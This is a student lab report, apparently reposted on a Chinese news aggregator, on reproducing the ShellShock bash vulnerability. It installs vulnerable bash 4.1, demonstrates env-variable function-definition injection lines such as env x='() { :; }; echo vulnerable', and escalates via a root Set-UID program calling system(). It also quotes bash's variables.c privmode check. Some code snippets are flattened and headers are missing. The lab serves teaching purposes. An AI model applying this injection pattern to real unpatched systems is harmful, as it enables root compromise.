当前位置: 首页 > news >正文

20252803-Linux安全类实验-ShellShock 攻击实验 - 详解

任务

  1. 完成实验楼上Linux安全类实验中的一个,两人一组,题目不能重复。
  2. 提交Word版报告,重点是遇到的问题和解决方案

实验过程(ShellShock 攻击实验)

1. 环境搭建

以root权限安装4.1版bash(4.2版本以上的漏洞已经被堵上了) bash4.1 原来的下载地址是 http://ftp/gnu.org/gnu/bash/bash-4.1.tar.gz ,为了加快速度,我们这里使用下面的下载地址 http://labfile.oss.aliyuncs.com/bash-4.1.tar.gz

下载

$ sudo su
$ wget http://labfile.oss.aliyuncs.com/bash-4.1.tar.gz

在这里插入图片描述

安装

$ tar xf bash-4.1.tar.gz
$ cd bash-4.1
$ ./configure #这一步过程比较长,请等待一会
$ make && make install

安装完成:
在这里插入图片描述

链接

$ rm /bin/bash
$ ln -s /usr/local/bin/bash /bin/bash

在这里插入图片描述

到这里就安装完了,接下来检测是否存在shellshock漏洞。

$ exit
$ env x='() { :; }; echo vulnerable' bash -c "echo this is a test"

在这里插入图片描述
输出vulnerable的话,说明bash有漏洞。
最后,让/bin/sh 指向/bin/bash.

$ sudo ln -sf /bin/bash /bin/sh

在这里插入图片描述
现在一切就绪,进入下一步吧。

2.预备知识

了解bash自定义函数,只需要函数名就能够调用该函数。

$ foo() { echo bar; }
$ foo
> bar

在这里插入图片描述

这个时候的Bash的环境变量:

KEY = foo
VALUE = () { echo bar; }

来看看ShellShock漏洞的真身:

export foo='() { :; }; echo Hello World'
bash
>Hello World

在这里插入图片描述

为什么调用bash的时候输出Hello World了呢?瞧瞧他内部的情况:

KEY = foo
VALUE = () { :; }; echo Hello World

bash读取了环境变量,在定义foo之后直接调用了后面的函数。 一旦调用bash,自定义的语句就直接触发。

3、攻击Set-UID程序

本实验中,我们通过攻击Set-UID程序来获得root权限。

我们知道system()函数将调用"/bin/sh -c" 来运行指定的命令, 这也意味着/bin/bash 会被调用,你能够利用shellshock漏洞来获取权限么? 首先,确保安装了带有漏洞的bash版本,并让/bin/sh 指向/bin/bash.

$ sudo ln -sf /bin/bash /bin/sh

在这里插入图片描述

在 /home/shiyanlou 目录下新建一个 shock.c 文件:

$ vi shock.c

按 I 键切换到插入模式,再输入如下内容:

#include 
#include 
#include 
void main()
{setuid(geteuid()); // make real uid = effective uid.system("/bin/ls -l");
}

在这里插入图片描述

编译这段代码,并设置其为Set-UID程序,保证它的所有者是root。

$ sudo su
$ gcc -o shock shock.c
$ chmod u+s shock

在这里插入图片描述

我们注意到这里使用了setuid(geteuid()) 来使real uid = effective uid,这在Set-UID程序中不是普遍现象,但它确实有时会发生。 先自己试着hack一下:) 以下是hack过程:
在这里插入图片描述

如果 setuid(geteuid()) 语句被去掉了,再试试看攻击,我们还能够拿到权限么?

#include 
void main()
{system("/bin/ls -l");
}
$ sudo su
$ gcc -o sh0ck shock.c
$ chmod u+s sh0ck
$ ls -il sh0ck
$ exit
$ ./sh0ck

在这里插入图片描述

(hack过程与step1完全一样,sh0ck是编译后的程序)

失败了!这就说明如果 real uid 和 effective uid 相同的话,定义在环境变量中的内容在该程序内有效,那样shellshock漏洞就能够被利用了。但是如果两个 uid 不同的话,环境变量失效,就无法发动攻击了,这可以从 bash的源代码中得到印证(variables.c,在308到369行之间)请指出是哪一行导致了这样的不同,并说明bash这样设计的原因。

这里给出部分代码

/* Initialize the shell variables from the current environment.If PRIVMODE is nonzero, don't import functions from ENV orparse $SHELLOPTS. */
void
initialize_shell_variables (env, privmode)char **env;int privmode;
{char *name, *string, *temp_string;int c, char_index, string_index, string_length;SHELL_VAR *temp_var;create_variable_tables ();for (string_index = 0; string = env[string_index++]; ){char_index = 0;name = string;while ((c = *string++) && c != '=');if (string[-1] == '=')char_index = string - name - 1;/* If there are weird things in the environment, like `=xxx' or astring without an `=', just skip them. */if (char_index == 0)continue;/* ASSERT(name[char_index] == '=') */name[char_index] = '\0';/* Now, name = env variable name, string = env variable value, andchar_index == strlen (name) */temp_var = (SHELL_VAR *)NULL;/* If exported function, define it now.  Don't import functions fromthe environment in privileged mode. */if (privmode == 0 && read_but_dont_execute == 0 && STREQN ("() {", string, 4)){string_length = strlen (string);temp_string = (char *)xmalloc (3 + string_length + char_index);strcpy (temp_string, name);temp_string[char_index] = ' ';strcpy (temp_string + char_index + 1, string);parse_and_execute (temp_string, name, SEVAL_NONINT|SEVAL_NOHIST);/* Ancient backwards compatibility.  Old versions of bash exportedfunctions like name()=() {...} */if (name[char_index - 1] == ')' && name[char_index - 2] == '(')name[char_index - 2] = '\0';if (temp_var = find_function (name)){VSETATTR (temp_var, (att_exported|att_imported));array_needs_making = 1;}elsereport_error (_("error importing function definition for `%s'"), name);/* ( */if (name[char_index - 1] == ')' && name[char_index - 2] == '\0')name[char_index - 2] = '(';   /* ) */}

摘出其中关键部分并简化

void initialize_shell_variables(){
// 循环遍历所有环境变量
for (string_index = 0; string = env[string_index++]; ) {/*...*//* 如果有export过的函数, 在这里定义 *//* 无法导入在特权模式下(root下)定义的函数 */if (privmode == 0 && read_but_dont_execute == 0 &&STREQN (“() {“, string, 4)) {[...]// 这里是shellshock发生的地方// 传递函数定义 + 运行额外的指令parse_and_execute (temp_string, name,SEVAL_NONINT|SEVAL_NOHIST);
[...]
} }

就是上述那一行判断逻辑导致了两者的不同,primode即私有模式,要求real uid 与 effective uid保持一致。

4、已拿到shock权限,完成实验

在这里插入图片描述

http://www.jsqmd.com/news/285584/

相关文章:

  • 铟材料:稀散金属隐形明星,半导体+光伏核心刚需
  • 自动驾驶仿真软件推荐:康谋aiSim——ISO 26262 ASIL-D 认证的高保真选择
  • 关于Uvicorn:一个遵循ASGI规范的异步Web服务器
  • 9个最佳性能测试工具(2026)
  • 058.质数判断 +质数筛 + 质因子分解
  • 超融合 “进化论”:当 HCI 遇上云原生技术栈,下一代基础设施雏形初现
  • 从零构建云原生“试验田”:超融合的自我修养
  • 智慧园区智能照明控制系统解决方案
  • 3-VueAjax
  • 基于springBoot的动漫分享系统的设计与实现
  • 天然蛋白与重组蛋白的技术区别与实验应用全解析:科研试剂视角下的最佳指南
  • 2026年还在靠“开机等单”跑网约车?学会这几条,超越同城80%的司机!
  • 导师严选2026 AI论文平台TOP8:MBA开题报告全测评
  • 基于springBoot的高校学生绩点管理系统的设计与实现
  • 5年测试被裁,去面试差点被问哭了······
  • 基于springBoot的房屋租赁管理系统
  • 基于springBoot的高校毕业生公职资讯系统的设计与实现
  • 金三银四,我不允许你们不知道这些软件测试面试题
  • 基于SpringBoot的高校餐饮档口管理系统的设计与实现
  • 看似平平无奇的00后,居然一跃上岸字节,表示真的卷不过......
  • 设计模式——模板方法模式
  • 设计模式——桥接模式
  • 基于springBoot的高校大学生党建系统设计与实现
  • 深入解析反广告拦截器的技术实现原理
  • AI论文生成神器盘点:7款支持文献综述一键生成+真实文献交叉引用的AI工具,高效搞定论文写作!
  • Dify:一站式AI应用开发平台全解析与Windows部署指南
  • 物联网+云平台:智慧园区变电所的智能化运维革命
  • 2026 护师考试选对刷题软件,效率提升 200%(附最新排行榜)
  • 远程控制+智能调度,打造园区电力“无人值守”新模式
  • Java基于SSM+JSP的智慧农业无人机租赁系统的设计与实现